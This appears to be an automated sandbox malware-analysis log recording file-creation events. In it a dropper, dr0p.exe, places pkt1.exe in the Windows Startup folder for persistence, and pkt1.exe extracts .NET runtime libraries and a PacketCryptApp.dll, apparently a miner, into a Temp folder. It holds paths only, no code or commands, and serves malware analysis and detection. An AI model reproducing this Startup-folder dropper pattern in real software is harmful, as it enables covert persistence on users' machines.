Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.VisualBasic.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Threading.Tasks.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.Serialization.Json.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.Http.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.WebHeaderCollection.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Dynamic.Runtime.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Reflection.Emit.Lightweight.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Reflection.TypeExtensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.Pipes.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.Loader.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.CompilerServices.VisualC.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Text.Json.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.Tools.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Threading.Tasks.Extensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.Serialization.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.Principal.Windows.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Drawing.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Threading.Tasks.Parallel.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.DiagnosticSource.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.Mail.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Formats.Tar.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Xml.Linq.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Private.CoreLib.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Data.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ComponentModel.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Threading.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Text.Encodings.Web.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Web.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.Cryptography.Csp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.InteropServices.RuntimeInformation.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.Cryptography.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.Quic.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Web.HttpUtility.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.NetworkInformation.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.FileSystem.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.Process.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.StackTrace.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Xml.XmlSerializer.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Threading.ThreadPool.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Numerics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Private.DataContractSerialization.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.Tracing.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.Ping.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ComponentModel.DataAnnotations.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Threading.Thread.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.WebSockets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.UnmanagedMemoryStream.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Reflection.DispatchProxy.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.Extensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.FileSystem.DriveInfo.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Reflection.Extensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Reflection.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Resources.Reader.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Collections.NonGeneric.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Xml.XPath.XDocument.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Numerics.Vectors.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.Compression.Brotli.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Core.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.Pipes.AccessControl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\PacketCryptApp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ComponentModel.TypeConverter.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\mscorlib.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Transactions.Local.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Xml.XPath.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Reflection.Metadata.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.Compression.ZipFile.dll	Jump to dropped file
Source: C:\Users\user\Desktop\dr0p.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.TextWriterTraceListener.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.Cryptography.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Threading.Channels.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.FileSystem.AccessControl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Xml.Serialization.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.InteropServices.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.Compression.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.Debug.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Reflection.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Windows.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\netstandard.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.TraceSource.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Collections.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Buffers.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ServiceProcess.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.Serialization.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Xml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Memory.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.Cryptography.Cng.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Text.Encoding.CodePages.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.InteropServices.JavaScript.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ComponentModel.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.IsolatedStorage.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.WebClient.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.AppContext.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Private.Xml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Globalization.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ComponentModel.EventBasedAsync.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.NameResolution.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\WindowsBase.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.Claims.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.WebSockets.Client.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.AccessControl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.Compression.FileSystem.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.Win32.Registry.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.Serialization.Xml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Linq.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.FileSystem.Watcher.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Text.Encoding.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.FileSystem.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Private.Xml.Linq.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.HttpListener.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ValueTuple.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Xml.XDocument.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.Cryptography.Algorithms.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Reflection.Emit.ILGeneration.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Formats.Asn1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ServiceModel.Web.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Transactions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.FileVersionInfo.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.Intrinsics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Collections.Concurrent.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Drawing.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.CompilerServices.Unsafe.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.Http.Json.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Resources.ResourceManager.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Reflection.Emit.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Private.Uri.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.Sockets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Text.RegularExpressions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.Security.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Globalization.Calendars.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Globalization.Extensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Collections.Specialized.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.Principal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.Contracts.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Threading.Overlapped.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.ServicePoint.dll	Jump to dropped file
